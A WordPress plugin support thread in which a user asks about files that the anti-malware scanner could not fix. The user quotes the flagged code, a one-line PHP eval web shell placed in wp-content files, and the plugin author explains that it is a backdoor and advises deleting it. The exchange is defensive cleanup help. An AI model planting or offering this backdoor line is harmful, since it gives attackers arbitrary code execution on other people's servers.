file not writable

  • Resolved codingcoders

    (@codingcoders)


    7 years, 8 months ago

    Hi, first off, thanks for the great and very useful plugin!

    Secondly, I ran the scan and it found and fixed multiple files (thanks again!), but it ran into errors on these files:

    Fixing …/wp-content/fsec.php … Failed: file not writable!
    Fixing …/wp-content/iii.php … Failed: file not writable!
    Fixing …/wp-content/iii.phtml … Failed: file not writable!

    In those files, it finds this part of the code (bolded) as the issue:
    […]: SITE cpto /tmp/.<?php eval($_REQUEST[cmd]); echo GOOD;?>

    I checked, and the file permissions for those files is 644. So the question is, do I change the permissions and let Anti-Malware do its thing? Or no? I’m just not sure if these are important files, or just garbage.

    Thanks!

    https://wordpress.org/plugins/gotmls/

Viewing 2 replies - 1 through 2 (of 2 total)
  • Plugin Author Eli

    (@scheeeli)

    7 years, 8 months ago

    That malicious eval code is a serious back-door that would allow a hacker to run any code they want on your server. The permissions look ok but maybe the file owner has been changed or maybe there is some other reason that the files cannot be changed.

    You should try and remove that highlighted code manually if my plugin cannot fix the files or just delete those files if they are all bad code.

    Thread Starter codingcoders

    (@codingcoders)

    7 years, 8 months ago

    o okay, thank you for that info. I just deleted all the files with that code since they didn’t seem important.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘file not writable’ is closed to new replies.